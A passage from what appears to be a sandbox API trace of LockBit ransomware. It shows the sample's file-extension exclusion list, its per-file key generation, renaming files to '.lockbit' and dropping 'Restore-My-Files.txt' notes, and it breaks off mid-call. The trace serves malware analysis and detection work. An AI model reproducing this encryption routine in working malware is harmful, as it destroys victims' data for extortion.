[0115.732] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0115.732] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0115.732] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0115.732] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD01548_.WMF") returned 1 [0115.732] lstrcmpiW (lpString1="ntldr", lpString2="FD01548_.WMF") returned 1 [0115.732] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD01548_.WMF") returned 1 [0115.732] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD01548_.WMF") returned -1 [0115.733] lstrcmpiW (lpString1="autorun.inf", lpString2="FD01548_.WMF") returned -1 [0115.733] lstrcmpiW (lpString1="thumbs.db", lpString2="FD01548_.WMF") returned 1 [0115.733] lstrcmpiW (lpString1="iconcache.db", lpString2="FD01548_.WMF") returned 1 [0115.733] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0115.733] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF") returned=".WMF" [0115.733] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0115.733] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0115.733] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0115.733] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0115.733] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0115.733] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0115.733] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0115.733] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0115.733] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0115.733] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0115.733] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0115.733] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0115.733] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0115.733] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0115.733] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0115.733] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0115.734] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0115.734] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0115.734] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0115.734] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0115.734] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0115.734] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0115.734] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0115.734] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0115.734] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0115.734] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0115.734] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0115.734] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0115.734] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF.lockbit") returned 72 [0115.734] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01548_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0115.735] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0115.735] malloc (_Size=0x40068) returned 0x1ff1e60 [0115.735] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=10316) returned 1 [0115.735] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.736] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.736] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0115.736] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.736] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.736] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0115.736] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0115.747] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0115.747] malloc (_Size=0xa6) returned 0x77d7a8 [0115.747] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0115.748] free (_Block=0x77d7a8) [0115.748] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0115.748] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0115.748] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0115.748] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4fe7000, ftCreationTime.dwHighDateTime=0x1bd4bcf, ftLastAccessTime.dwLowDateTime=0x60c49690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd4fe7000, ftLastWriteTime.dwHighDateTime=0x1bd4bcf, nFileSizeHigh=0x0, nFileSizeLow=0x76ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD01657_.WMF", cAlternateFileName="")) returned 1 [0115.748] lstrcmpiW (lpString1=".", lpString2="FD01657_.WMF") returned -1 [0115.748] lstrcmpiW (lpString1="..", lpString2="FD01657_.WMF") returned -1 [0115.748] PathFindExtensionW (pszPath="FD01657_.WMF") returned=".WMF" [0115.748] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0115.749] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0115.749] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0115.749] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0115.749] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0115.749] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0115.749] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0115.749] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0115.749] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0115.749] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0115.749] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0115.749] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0115.749] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0115.749] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0115.749] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0115.749] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0115.749] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0115.749] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0115.749] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0115.749] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0115.749] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0115.749] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0115.750] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0115.750] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0115.750] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0115.750] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0115.750] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0115.750] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0115.750] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0115.750] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0115.750] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0115.750] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0115.750] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0115.750] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0115.750] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0115.750] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0115.750] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0115.750] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0115.750] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0115.750] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0115.750] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0115.750] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0115.750] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0115.751] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0115.751] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0115.751] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0115.751] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0115.751] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD01657_.WMF") returned 1 [0115.751] lstrcmpiW (lpString1="ntldr", lpString2="FD01657_.WMF") returned 1 [0115.751] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD01657_.WMF") returned 1 [0115.751] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD01657_.WMF") returned -1 [0115.751] lstrcmpiW (lpString1="autorun.inf", lpString2="FD01657_.WMF") returned -1 [0115.751] lstrcmpiW (lpString1="thumbs.db", lpString2="FD01657_.WMF") returned 1 [0115.751] lstrcmpiW (lpString1="iconcache.db", lpString2="FD01657_.WMF") returned 1 [0115.751] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0115.751] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF") returned=".WMF" [0115.751] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0115.751] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0115.751] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0115.751] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0115.751] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0115.751] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0115.751] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0115.751] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0115.752] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0115.752] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0115.752] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0115.752] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0115.752] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0115.752] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0115.752] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0115.752] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0115.752] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0115.752] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0115.752] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0115.752] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0115.752] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0115.752] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0115.752] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0115.752] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0115.752] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0115.752] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0115.752] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0115.753] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0115.753] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF.lockbit") returned 72 [0115.753] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01657_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0115.753] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0115.753] malloc (_Size=0x40068) returned 0x3ef0008 [0115.753] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=30414) returned 1 [0115.754] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.754] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.754] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0115.754] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.755] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.755] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0115.755] ReadFile (in: hFile=0x81c, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0115.763] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0115.763] malloc (_Size=0xa6) returned 0x77d7a8 [0115.764] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0115.765] free (_Block=0x77d7a8) [0115.765] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0115.765] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0115.765] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0115.765] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eb44f00, ftCreationTime.dwHighDateTime=0x1bd4c0c, ftLastAccessTime.dwLowDateTime=0x60c49690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4eb44f00, ftLastWriteTime.dwHighDateTime=0x1bd4c0c, nFileSizeHigh=0x0, nFileSizeLow=0x4604, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD01658_.WMF", cAlternateFileName="")) returned 1 [0115.765] lstrcmpiW (lpString1=".", lpString2="FD01658_.WMF") returned -1 [0115.765] lstrcmpiW (lpString1="..", lpString2="FD01658_.WMF") returned -1 [0115.765] PathFindExtensionW (pszPath="FD01658_.WMF") returned=".WMF" [0115.765] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0115.765] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0115.765] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0115.765] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0115.766] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0115.766] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0115.766] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0115.766] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0115.766] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0115.766] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0115.766] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0115.766] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0115.766] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0115.766] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0115.766] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0115.766] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0115.766] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0115.766] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0115.766] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0115.766] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0115.766] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0115.766] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0115.766] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0115.766] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0115.766] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0115.767] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0115.767] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0115.767] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0115.767] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0115.767] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0115.767] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0115.767] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0115.767] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0115.767] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0115.767] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0115.767] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0115.767] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0115.767] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0115.767] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0115.767] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0115.767] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0115.767] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0115.767] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0115.767] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0115.767] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0115.768] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0115.768] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0115.768] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD01658_.WMF") returned 1 [0115.768] lstrcmpiW (lpString1="ntldr", lpString2="FD01658_.WMF") returned 1 [0115.768] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD01658_.WMF") returned 1 [0115.768] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD01658_.WMF") returned -1 [0115.768] lstrcmpiW (lpString1="autorun.inf", lpString2="FD01658_.WMF") returned -1 [0115.768] lstrcmpiW (lpString1="thumbs.db", lpString2="FD01658_.WMF") returned 1 [0115.768] lstrcmpiW (lpString1="iconcache.db", lpString2="FD01658_.WMF") returned 1 [0115.768] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0115.768] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF") returned=".WMF" [0115.768] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0115.768] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0115.768] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0115.768] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0115.768] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0115.768] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0115.768] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0115.768] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0115.768] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0115.768] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0115.769] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0115.769] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0115.769] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0115.769] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0115.769] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0115.769] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0115.769] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0115.769] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0115.769] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0115.769] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0115.769] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0115.769] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0115.769] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0115.769] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0115.769] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0115.769] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0115.769] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0115.769] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0115.769] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF.lockbit") returned 72 [0115.769] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01658_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0115.775] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0115.776] malloc (_Size=0x40068) returned 0x3d70450 [0115.776] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=17924) returned 1 [0115.776] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.776] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.776] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0115.776] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.777] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0115.777] ReadFile (in: hFile=0x13c0, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0115.779] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0115.779] malloc (_Size=0xa6) returned 0x77d7a8 [0115.780] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0115.780] free (_Block=0x77d7a8) [0115.780] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0115.780] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0115.780] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, 